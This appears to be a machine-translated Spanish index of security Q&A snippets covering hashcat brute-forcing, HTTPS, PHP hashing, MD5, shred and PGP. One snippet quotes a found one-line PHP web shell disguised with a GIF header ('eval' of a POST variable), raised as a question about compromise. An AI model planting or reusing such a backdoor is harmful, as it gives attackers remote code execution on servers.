Todas las preguntas

5
respuestas

¿Puedo aumentar mis claves probadas por segundo usando un ataque de diccionario en comparación con bruteforce ...?

Estoy usando cudahashcat para aplicar fuerza bruta a mi sky router con una contraseña en mayúscula de 8 caracteres, con claves probadas a aproximadamente 4200k / s. Cuando utilizo cudahashcat con un diccionario que creé con crujido, todavía obte...
pregunta 25.05.2017 - 19:15
7
respuestas

¿Cómo se pueden comprometer los datos http en una red segura?

Entiendo que es malo enviar contraseñas en texto sin formato por el cable porque alguien puede verlo y robar su información claramente, y que la solución es usar HTTPS porque la información está cifrada entre los puntos finales. Si está en un...
pregunta 01.11.2011 - 20:24
1
respuesta

TLS WG Charter y objetivos de seguridad

Estaba viendo la Carta del Grupo de Trabajo de TLS . Noté que la confidencialidad e integridad de los mensajes para aquellos que lo desean no son objetivos no para el grupo. De manera ingenua, creo que la confidencialidad y la integridad s...
pregunta 28.07.2014 - 15:21
3
respuestas

¿Por qué PHP password_hash usa blowfish intstead threefish?

Me preguntaba por qué la función hash_password de PHP usa blowfish en lugar de threefish. Según Bruce Schneider, el pez globo está desactualizado y él está recomendando twofish o threefish. ¿Blowfish es lo suficientemente seguro y threefish solo...
pregunta 11.01.2016 - 16:14
3
respuestas

¿Este archivo PHP que contiene una evaluación de una variable POST es una indicación de compromiso?

Encontré este archivo en mi servidor, contiene el siguiente código: GIF89a <?php eval ($_POST[plm12345plm]); ?> No hay otro código al lado de este. ¿Es esto malicioso?     
pregunta 04.05.2015 - 21:25
2
respuestas

Localice el servidor por la latencia que tiene con otros servidores

Acabo de pensar en cómo se puede localizar un servidor en el que tiene privilegios administrativos. Mi "mejor" idea hasta ahora es hacer ping a una gran cantidad de servidores y luego medir la latencia del host a estos servidores y luego calcula...
pregunta 17.12.2015 - 19:48
2
respuestas

¿Fuerza bruta MD5 en un hash defectuoso?

MD5 para contraseñas se considera inseguro debido a la capacidad de fuerza y selección bruta hasta el resultado. Pero, ¿qué pasa si cambio algunos caracteres de un hash MD5 y mantengo un registro de ese cambio para que luego pueda coincidir...
pregunta 04.09.2015 - 11:58
1
respuesta

triturar - diferente tamaño de dispositivo

Cuando necesito limpiar correctamente un disco duro, tiendo a usar shred en todo el dispositivo, es decir, apuntando shred al /dev/sdX sin tener en cuenta particiones particulares; sin embargo, noté que el tamaño del dispositivo listado p...
pregunta 22.10.2014 - 17:38
3
respuestas

¿Es posible que descifrar una contraseña no tenga sentido para un atacante con acceso a la base de datos?

He estado leyendo información sobre cómo hacer que las contraseñas sean seguras, pero ¿cuáles son las razones por las que un atacante querría esforzarse para obtener la contraseña original? Si un atacante realmente tiene una copia de la base de...
pregunta 21.09.2015 - 20:23
2
respuestas

PGP Encryption - ¿Cuál es la necesidad de cifrar usando una clave aleatoria una vez? [duplicar]

Acabo de leer sobre el esquema de encriptación PGP aquí y comencé a preguntarme cuál es la necesidad de cifrar el archivo con uno. tiempo clave aleatoria? En otras palabras, ¿cómo es este esquema más seguro que simplemente enviar el archivo...
pregunta 31.07.2014 - 14:47